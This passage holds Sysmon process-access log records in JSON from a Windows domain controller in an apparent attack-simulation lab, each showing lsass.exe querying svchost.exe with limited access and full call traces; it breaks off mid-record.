{"EventTime":"2020-08-01 05:52:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5341,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:45.828\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 4072\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:45.828","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"4072","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5342,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:45.828\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 4072\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:45.828","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"4072","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5343,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:45.828\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 4072\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:45.828","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"4072","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5344,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:45.844\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 4072\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:45.844","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"4072","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5345,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:45.844\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 4072\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:45.844","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"4072","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5346,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:45.844\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 4072\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:45.844","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"4072","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5347,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:46.015\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:46.015","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5348,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:46.015\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 